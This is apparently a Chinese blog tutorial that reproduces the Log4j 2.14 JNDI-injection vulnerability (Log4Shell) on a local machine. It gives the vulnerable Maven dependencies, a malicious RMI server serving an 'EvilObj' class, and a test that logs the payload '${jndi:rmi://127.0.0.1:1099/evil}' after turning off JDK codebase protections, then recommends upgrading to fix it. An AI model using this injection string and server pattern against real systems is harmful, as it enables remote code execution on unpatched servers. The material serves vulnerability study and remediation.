1.依赖
// 2.15.0
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-api</artifactId>
<version>2.14.0</version>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.0</version>
</dependency>
2.恶意服务代码
package com.jay.rmi;
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
public class RMIserver {
public static void main(String[] args) {
try {
LocateRegistry.createRegistry(1099);
Registry registry = LocateRegistry.getRegistry();
System.out.println("create RMI register on port 1099 ");
Reference reference = new Reference("EvilObj","EvilObj", null); // "http://127.0.0.1:80/"
ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
registry.bind("evil",referenceWrapper);
} catch (Exception e){
e.printStackTrace();
}
}
}
package com.jay.rmi;
public class EvilObj {
static {
System.out.println("我是jay");
}
}
3.测试
package com.jay;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class Log4jTest {
private static final Logger LOGGER = LogManager.getLogger();
public static void main(String[] args) {
// 以下三行低版本jdk不需要
System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true");
System.setProperty("java.rmi.server.useCodebaseOnly","false");
String userName = "${jndi:rmi://127.0.0.1:1099/evil}";
// String userName = "${java:os}";
// String userName = "${java:vm}";
LOGGER.info("hello, {}!", userName);
}
}
先开启RMIserver
在运行Log4jTest
结果 ${java:os} 2.14打印以下内容, 2.15无法打印。
2021-12-13 13:42:00.003 [main] INFO [Log4jTest:22] - hello, Windows 10 10.0, architecture: amd64-64!
Process finished with exit code 0
具体大家可以试试自己测试。
总结
把版本升级至2.15或者把jdk版本升高即可暂时修复此问题。